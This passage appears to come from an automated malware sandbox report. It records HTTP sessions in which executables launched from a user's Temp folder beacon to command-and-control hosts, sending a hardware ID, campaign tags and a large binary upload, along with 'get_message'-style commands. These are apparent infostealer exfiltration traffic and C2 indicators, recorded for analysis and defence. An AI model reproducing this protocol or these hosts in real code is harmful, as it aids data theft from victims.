                                                                                                                                                                                                                                            Data Ascii: --PMR5V0MA4F2ER9VZContent-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--PMR5V0MA4F2ER9VZContent-Disposition: form-data; name="pid"1--PMR5V0MA4F2ER9VZContent-Disposition: form-data; name="lid"FATE99--test--PMR
                                                                                                                                                                                                                                            2024-12-09 20:09:26 UTC1029INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:26 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=81lke56hq88idrrcuvebnrirc7; expires=Fri, 04-Apr-2025 13:56:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6OpHZfloFP9ihI%2Faa%2F2zHvlIYIyVfIaRysMmZp2WK7HSZWCqlc%2B1JVU3P%2BM9hR701%2B30%2Bii7qb1%2BhUJmg9vB00jbhRISPKDbQJQbVeNqsdI11M3TvY7X65W6cuOcHY%2B%2FQq8rPFM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a1ff2a924339-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1594&rtt_var=610&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2134&delivery_rate=1776155&cwnd=227&unsent_bytes=0&cid=1187164c3005d14f&ts=1163&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                            2024-12-09 20:09:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            6192.168.2.649905172.67.139.784435564C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:28 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=AXAJ9YUXQO97CCBYD9
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 571410
                                                                                                                                                                                                                                            Host: drive-connect.cyou
                                                                                                                                                                                                                                            2024-12-09 20:09:28 UTC15331OUTData Raw: 2d 2d 41 58 41 4a 39 59 55 58 51 4f 39 37 43 43 42 59 44 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 41 58 41 4a 39 59 55 58 51 4f 39 37 43 43 42 59 44 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 58 41 4a 39 59 55 58 51 4f 39 37 43 43 42 59 44 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d
                                                                                                                                                                                                                                            Data Ascii: --AXAJ9YUXQO97CCBYD9Content-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--AXAJ9YUXQO97CCBYD9Content-Disposition: form-data; name="pid"1--AXAJ9YUXQO97CCBYD9Content-Disposition: form-data; name="lid"FATE99--test
                                                                                                                                                                                                                                            2024-12-09 20:09:28 UTC15331OUTData Raw: 4b 40 71 4a 84 53 2c e9 18 e2 5c 72 f8 b1 cc 47 94 a6 49 74 73 56 66 84 31 36 72 a6 6a 92 6f c3 bc 45 85 ac 3c 3e 56 de 28 35 45 4f ea 4a 62 f9 64 5c 5d 72 31 a3 f2 b3 74 d1 08 9f d1 c3 f0 43 bd d8 58 f1 07 45 dc 62 3c 18 47 b5 4f f1 7e 19 aa d2 0d 12 38 77 a4 88 57 21 22 2b 5e ff 86 09 a1 7f 7f 34 ec 27 31 2b 44 67 a0 da 27 d7 c5 fa 8a 86 23 19 22 44 35 dd 29 03 80 b1 3d 51 81 3b 4d a2 64 cc 1b 19 c6 44 d8 13 9e 27 5b ab d2 fb 96 cc e1 98 41 98 2d 24 b8 25 81 e9 43 c3 f1 dc 5b 91 1a 1f af 8f db c6 a9 8f 2b bd fc e2 c0 7c e6 60 cd b2 a7 4b c7 6d df f2 7b 3c 07 07 a5 9d b8 f1 a2 d6 0f 7c d7 2a 34 37 96 fe b8 cb ed 48 80 32 51 91 ac 30 12 2c 30 4d c9 d7 74 6d 20 75 60 2f 32 b2 fb fd 24 77 1a a5 cd 6f 58 70 0f 8d 45 6f d7 87 ed b3 34 c4 c2 b3 f8 12 4a f2 0a
                                                                                                                                                                                                                                            Data Ascii: K@qJS,\rGItsVf16rjoE<>V(5EOJbd\]r1tCXEb<GO~8wW!"+^4'1+Dg'#"D5)=Q;MdD'[A-$%C[+|`Km{<|*47H2Q0,0Mtm u`/2$woXpEo4J
                                                                                                                                                                                                                                            2024-12-09 20:09:28 UTC15331OUTData Raw: e5 d9 85 f9 9e f9 ca f5 8e 42 eb 83 7c 64 fd 13 d6 aa b5 02 92 5e 3f ca da c3 f0 03 e6 1b c7 6e f7 73 9f c0 04 66 fd 9a f9 40 4b 4a 41 25 bb 79 a2 f3 d1 c7 f0 0a d1 db f4 1f be a2 51 2f 4a 79 ef 7f 44 12 ba 3a d8 2f 1c 08 1e bd 9d 86 f3 07 32 d7 16 de 0c 57 f7 7e 50 25 35 1c d9 7d 87 dd 59 56 3b 9e 58 ed 55 54 35 bf 1e 32 ec 55 36 32 19 ce 5d c9 ac aa 5a d8 fc 10 e2 37 7b b4 8c fc e5 ef d7 10 e3 5d 00 f7 93 93 d6 4f b3 80 ff 7e 64 96 af 74 e8 ab c3 75 05 dc c5 f3 ac c1 cc c0 9d a1 2f 62 ce 1b 87 14 e4 a4 96 36 7f dc 5e a3 8f fe ab 26 6c e2 fc f5 f5 46 86 e8 d8 f2 7d 87 ea f9 6f e1 ac b1 a7 82 35 1d bf d7 4c fe a4 f0 ad 86 d3 51 c5 2c d2 9e 1b 49 7b e8 5d fe 2a b7 af 0f 0b 5b 19 73 4a 1c aa ee be 1b 2a b9 f9 cf 10 7b bd aa 9e 3f 87 a5 1c 36 1a f9 d5 c3 c0
                                                                                                                                                                                                                                            Data Ascii: B|d^?nsf@KJA%yQ/JyD:/2W~P%5}YV;XUT52U62]Z7{]O~dtu/b6^&lF}o5LQ,I{]*[sJ*{?6
                                                                                                                                                                                                                                            2024-12-09 20:09:28 UTC15331OUTData Raw: 03 74 b8 35 8f 0f 5d da 16 d7 43 6f ee f7 af 0f f2 f2 df fa 13 0f a7 cd dc a2 df b4 e0 4b 5f bf 7f 5c f3 45 31 38 c1 fc b8 50 a9 ef 0a 69 52 3b f4 27 16 bb 1d e0 c3 7f 69 f3 4f fa aa d7 37 be e4 c6 31 05 ac 0b 91 ac 8a b9 57 8e c9 62 e2 7d 11 9b 24 dd b4 94 ea 4a 19 cf 86 de 80 a2 66 e8 5f e6 c4 9f 2d b0 d4 67 f9 14 46 9b f1 b3 09 87 01 66 dd 9f d1 74 cf ad d3 87 1b 79 e7 bf a2 22 ad 9f ef 90 7c 31 03 80 67 a7 e2 0c e6 2b 27 eb 9e ff e6 b2 fe 9b c8 e9 d3 be a5 94 ac 8d 6e da 65 bd f1 9e 96 d1 17 92 be e7 c2 e0 cf ab f1 6c 18 e2 96 8c e2 3c 56 dd 8e e9 c0 bb b8 e0 c9 57 17 cc 0c 56 64 6d 47 ed a8 0e 8e 96 38 1b 15 90 cc 5d f6 34 5d bb f7 85 fa 93 35 90 67 4a 9f 7b 54 bc 73 77 ff d7 21 fb ed 00 fd 9d c2 12 30 9c f8 19 49 a2 29 d0 8c f8 81 2e 3f 14 cd 0b 26
                                                                                                                                                                                                                                            Data Ascii: t5]CoK_\E18PiR;'iO71Wb}$Jf_-gFfty"|1g+'nel<VWVdmG8]4]5gJ{Tsw!0I).?&
                                                                                                                                                                                                                                            2024-12-09 20:09:28 UTC15331OUTData Raw: df 34 8f 63 5a 60 86 76 f5 27 ac 66 04 1f 60 6d 68 ce 03 e4 1b 84 44 c1 eb 76 6d 43 cd 55 bf 09 5f 55 47 64 ed 42 75 e0 d8 e0 10 93 b3 78 5c 13 a2 9d e1 b5 9b 66 bb 25 86 7f 5d 4a 52 c7 f4 69 88 03 97 a7 52 a7 af 82 29 d6 0e 4f fd 03 6d dd c4 16 f3 2b 54 f5 0b 35 06 d5 46 ad 8c 95 88 d6 ff 6d 5d 47 70 dd b5 cc 38 15 1e a1 52 75 3a 13 03 b2 ca 11 6f fe 9f 50 fd 7f 72 b6 01 9c 66 66 4b 11 01 73 18 70 0d 3d 35 62 2f 09 35 bd dc ee fa c5 09 58 c0 01 39 86 84 ec 86 1d 4b 04 08 dd ce 57 85 82 94 e0 74 e1 15 03 40 46 84 89 82 03 5d 77 80 69 77 7d 30 86 ad 86 6a 39 e5 6f 54 38 d4 32 87 ff 67 12 d5 8b 3e 3a d4 2a 5e 80 8c 79 25 41 fe 60 06 e1 e4 33 ea 42 8c be cb 05 bd 9e cd 77 17 c5 11 65 c8 69 5a 6c 2b ae d7 51 38 79 d0 30 a5 3a 56 e9 86 e8 14 4a c0 82 48 45 6c
                                                                                                                                                                                                                                            Data Ascii: 4cZ`v'f`mhDvmCU_UGdBux\f%]JRiR)Om+T5Fm]Gp8Ru:oPrffKsp=5b/5X9KWt@F]wiw}0j9oT82g>:*^y%A`3BweiZl+Q8y0:VJHEl
                                                                                                                                                                                                                                            2024-12-09 20:09:28 UTC15331OUTData Raw: 08 21 b1 6b ee 1a 3d 42 ab 5d 4c 5f cf 8c 4c 84 f1 ec 5e d4 b1 86 8f 7e 49 ba 9a ee f5 0b 1e 2f b2 ac 94 e9 01 a0 c2 4b 1a 59 f0 9b 56 4d 40 5d d1 6c a4 42 0c 36 77 99 bb 06 07 9f d0 b2 84 34 2d 49 10 94 3f 97 fb df 3a bb 7e bb 66 5e e1 32 b8 e3 f7 8c cf 77 64 1c e6 8f f4 bf 33 13 05 00 e0 08 03 8d 44 28 14 30 d7 a7 a6 1e 8c a4 9d 87 f3 c3 eb b0 27 94 1b 9d b7 7b 20 ae 7a ff 61 03 b0 86 cd 53 e0 d5 1f 23 37 87 28 02 e0 d5 52 1b 92 ae c0 a2 a7 84 fe 2a 3d 60 80 9d 0a d0 40 42 bc 88 43 08 13 2a fd 1e 93 7b 9a 10 13 59 ed fb a5 55 e0 85 be b7 e4 cd 96 91 bf 6f d8 b1 aa 3a 0e 39 0a 0b d7 3f d7 bb 55 7a fd 0d 44 1e df b8 bc 47 06 68 df 1c 9a f8 07 b3 f1 15 62 94 55 1f c3 31 04 c7 74 30 42 d0 42 a3 50 af e4 4f 59 7a e3 9e 4b 67 72 b1 be 85 05 35 04 fe 39 38 3e
                                                                                                                                                                                                                                            Data Ascii: !k=B]L_L^~I/KYVM@]lB6w4-I?:~f^2wd3D(0'{ zaS#7(R*=`@BC*{YUo:9?UzDGhbU1t0BBPOYzKgr598>
                                                                                                                                                                                                                                            2024-12-09 20:09:28 UTC15331OUTData Raw: 2a c8 43 47 a0 da b6 ba 39 22 cb fb 04 65 39 9c 63 c8 f2 0e 44 39 00 dd 47 ad 0b e3 fc c4 0a 48 6a 04 dd e0 6e 50 e4 83 b8 f6 03 73 ca 8c 50 77 a2 c0 20 3e b5 ee b8 cf da be 16 33 15 c9 4d 40 ad c8 7d 29 db cd 86 83 a0 4e 2d a6 54 bf 80 f7 24 d7 6f 4f 31 36 a4 75 fe 0b 5d 90 91 54 cc c5 a2 14 ed 78 10 07 25 eb 6b 1f 42 64 76 01 db 25 75 cb 03 62 18 18 7f 36 dc de 94 50 69 f5 5c 1c fe 2c 90 c6 fa ed ca fa fd 4f 5d cd b3 08 ee 66 ce f6 24 47 e9 8d 6b 8d 22 c7 2c 98 a5 b0 70 64 63 8f 35 db 3c 7e 31 9c d5 96 b8 a3 1e 43 51 1f 62 50 19 84 f1 c6 bf df be f8 f5 c2 86 6e f7 0a d6 7d e6 35 ee 32 b2 ff 94 ba d1 ea 0c 7d 99 f5 cf 6e a9 01 aa 2a 43 07 3b d5 c3 03 6a 96 bf ff f4 bc 79 29 c4 d2 8a 50 14 b7 59 81 89 9a 7f a3 7a fa fe 89 3b f3 4e 7d 9e 7e b9 3d 4f 5b 04
                                                                                                                                                                                                                                            Data Ascii: *CG9"e9cD9GHjnPsPw >3M@})N-T$oO16u]Tx%kBdv%ub6Pi\,O]f$Gk",pdc5<~1CQbPn}52}n*C;jy)PYz;N}~=O[
                                                                                                                                                                                                                                            2024-12-09 20:09:28 UTC15331OUTData Raw: 44 30 aa fa eb 27 6b 5f 7d be 85 6e fd d5 ba 8a ca 01 5d 65 d8 8b b7 fc 39 68 57 e4 8b 55 13 2d de 1c 22 7b ae de 7d 74 6e 88 3f 43 aa f2 51 86 bf 69 7c ae 4e 5b 99 3b 34 39 a7 c3 dc 3d fc 6d f5 28 3f 67 c8 64 e6 58 fd 4d 76 35 29 58 f0 dd 76 90 2e a1 0e 1d 6b 02 e0 a8 0e 98 ee dc 59 11 07 91 9c 63 5e 7b b0 7a de 4c 02 b4 8c a8 d0 6a ee df a7 3d 10 35 0d ff ce dd a7 92 5a 20 e1 ba f5 c5 23 d7 1a 64 bc 4c ef 6f 91 68 11 ab 6f 66 8a 8b 53 44 56 8e 67 17 f6 55 36 3c 2f 2c fe 69 8d 60 4a a3 32 3e 37 b0 fe 13 82 87 a3 e1 13 a2 c0 8e fd 01 12 3c a9 a8 d2 03 48 d0 29 05 9a 4d 7b ed 36 27 49 46 42 54 72 8b 05 60 be ba 3f 18 f4 b5 ae 12 a6 48 27 04 20 e0 44 ce 8b 27 35 3e dc ab 18 be 8f b4 d3 18 32 e8 f6 c6 59 90 ae 89 bb 8c 81 84 81 0c 4f 03 68 e9 af 3f c4 32 dc
                                                                                                                                                                                                                                            Data Ascii: D0'k_}n]e9hWU-"{}tn?CQi|N[;49=m(?gdXMv5)Xv.kYc^{zLj=5Z #dLohofSDVgU6</,i`J2>7<H)M{6'IFBTr`?H' D'5>2YOh?2
                                                                                                                                                                                                                                            2024-12-09 20:09:28 UTC15331OUTData Raw: e3 49 6d 97 60 db e8 8b 57 eb 1e f2 d8 d2 6f e3 71 44 e4 a0 cf 7b c3 3c 38 24 80 f7 6d d9 66 e1 21 5b 1a 25 09 ae 6f f6 28 2f e1 5e b1 a2 bd 92 31 34 75 04 e4 29 c4 85 76 b9 6c bc 9f 7b 19 64 b4 2b d5 06 1d f6 b2 49 77 8c 3b 98 91 6a 9f 19 b9 5f b6 d9 56 ef 49 f5 53 4c bf 92 0a 1c 00 1d fc eb 1f dd 28 62 b6 ea 30 f3 2c e2 ef 2b 98 e4 79 46 3a 3b 97 85 f7 f6 81 7e ad 16 26 21 eb d0 d8 ec 5c e0 e0 1c d5 85 68 7e 40 9f 14 aa 97 70 68 43 50 94 17 4c 73 88 29 89 0a af bf 10 e6 46 45 29 c6 7c e9 d5 b7 7f c9 5f a3 34 dc 86 b0 c2 42 31 27 1c 86 aa 5e 3e c1 b7 f0 ea 94 29 6e 45 46 f2 1d e7 c3 7a 65 a8 aa cc ac 83 61 46 fc d6 16 f0 8c b1 a3 e7 ed c4 f8 70 78 f5 c9 1f ba 51 a4 0e 16 2a 96 f1 62 89 8b 05 c5 32 a5 c2 eb 67 2d a8 aa e8 6b 08 4a f3 8a c0 33 49 ae 6a 90
                                                                                                                                                                                                                                            Data Ascii: Im`WoqD{<8$mf![%o(/^14u)vl{d+Iw;j_VISL(b0,+yF:;~&!\h~@phCPLs)FE)|_4B1'^>)nEFzeaFpxQ*b2g-kJ3Ij
                                                                                                                                                                                                                                            2024-12-09 20:09:28 UTC15331OUTData Raw: 6f 86 3b 8b 98 29 28 4d a1 59 df bd 0f c2 27 8e 30 41 d8 4e 71 35 d6 eb 87 90 2d c9 36 c1 4b bd 06 05 6b 30 31 a5 98 04 1b 1b d2 ac 33 86 7a 7d 36 0b 50 6a 05 49 9b 30 24 cc d1 02 f5 a1 33 c3 d5 cd 10 15 87 48 c6 f0 5c df cd 4f b5 7c 5d 98 f7 1d e4 0f f5 2e 0e f8 79 86 cf f5 ae 56 ed 3d ad 15 34 fb 99 ec 37 8b a1 0f 99 73 62 b2 4e 35 d2 e9 7e af fc d9 dc bb fe 6c 9e c1 d8 ac 2e 85 a5 4e fc 4f 6d 60 2f f1 0b 7a 9c ed 03 f1 69 62 94 71 88 d5 6d 43 9e 32 9f ff 50 58 fa 3b d8 7d 5c fc e3 c4 fa 1b 14 70 1b 1e 1c 60 5f 07 f2 a4 ec ea c8 99 c6 d9 0d 47 fa 50 7f 38 ab 9d 85 40 81 70 ff e5 85 6b 1b 11 ee b7 81 5e 29 10 14 04 ee c3 9e 93 08 78 60 a7 0b 3c f0 07 cc 1f 16 b8 85 c7 55 57 6b 1d 0b e7 24 40 64 b9 0c 58 21 f0 fb 76 ce 0a 82 7e d4 6a cc 52 ca fc dc 03 cf
                                                                                                                                                                                                                                            Data Ascii: o;)(MY'0ANq5-6Kk013z}6PjI0$3H\O|].yV=47sbN5~l.NOm`/zibqmC2PX;}\p`_GP8@pk^)x`<UWk$@dX!v~jR
                                                                                                                                                                                                                                            2024-12-09 20:09:32 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:32 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=37eu4sllae5k6g573hp46o2irk; expires=Fri, 04-Apr-2025 13:56:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfoHinh8PbAVeWRhIKCunjxPqV6MmjfWKYrKJro2iA5B9KJNjBBkXVwZtCDQFs%2FktQeBtiTpH1j1LXc1DLV9lNFXVpLQVv4Cg%2BUNryTg6yTm9zdJcSdfE6hIkKOmjxS5ed7d%2BTY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a2125dee4297-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2078&min_rtt=2073&rtt_var=788&sent=262&recv=597&lost=0&retrans=0&sent_bytes=2845&recv_bytes=573959&delivery_rate=1380614&cwnd=245&unsent_bytes=0&cid=d95011b3c8f3ea82&ts=4727&x=0"


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            7192.168.2.649921104.21.48.14435440C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:33 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:09:33 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                            2024-12-09 20:09:34 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:33 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=mbetp6eoqn77b7t7rfbilslign; expires=Fri, 04-Apr-2025 13:56:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FWdWDnodEGjBQvMuuLNgWaMBbLmXUN1o%2BWEEz%2BuofDuGc4sQWFnp4qgw8eGzZRehK0KCqPNghwovmye%2BDLj7xrm10n5p05oRD812G1znyBSUldNMIxfulvLuL5sOJzFY5XXcF4E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a22fea654231-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1599&rtt_var=601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1820448&cwnd=127&unsent_bytes=0&cid=b6113cf464ac422a&ts=998&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:34 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                            2024-12-09 20:09:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            8192.168.2.649924172.67.139.784435564C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:34 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 81
                                                                                                                                                                                                                                            Host: drive-connect.cyou
                                                                                                                                                                                                                                            2024-12-09 20:09:34 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43
                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=3384FC726411342223D904AF30EFEBBC
                                                                                                                                                                                                                                            2024-12-09 20:09:35 UTC1021INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:35 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=vp3ep73vldfiuttt81443lac1c; expires=Fri, 04-Apr-2025 13:56:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GHMiGMmdwCbUF5f%2BN4I1N3J9kwaqOfwV%2BNqX2bmsq3xylRSPyBMVkMJenSDcedX9%2B1iALxRqZEkbGdgykK887%2Fr6R13lRAy622Y%2BkaSCHMYfqZ7wd8q9nCkY6DD2jSqhpJmSdiI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a236bae48ce9-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5546&min_rtt=2108&rtt_var=3047&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=983&delivery_rate=1385199&cwnd=231&unsent_bytes=0&cid=90ad5627b1519a71&ts=1032&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:35 UTC54INData Raw: 33 30 0d 0a 55 39 71 70 52 6c 59 61 4d 52 6c 39 79 2f 70 64 4a 48 79 50 58 54 67 4f 58 6e 39 6e 63 35 2b 2b 63 32 33 38 4f 32 4b 49 79 4d 38 49 68 77 3d 3d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 30U9qpRlYaMRl9y/pdJHyPXTgOXn9nc5++c238O2KIyM8Ihw==
                                                                                                                                                                                                                                            2024-12-09 20:09:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            9192.168.2.649930104.21.48.14435440C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:35 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 53
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:09:35 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                                                            2024-12-09 20:09:36 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:36 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=2cmkvtoesf5og0kpptedl90rq2; expires=Fri, 04-Apr-2025 13:56:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
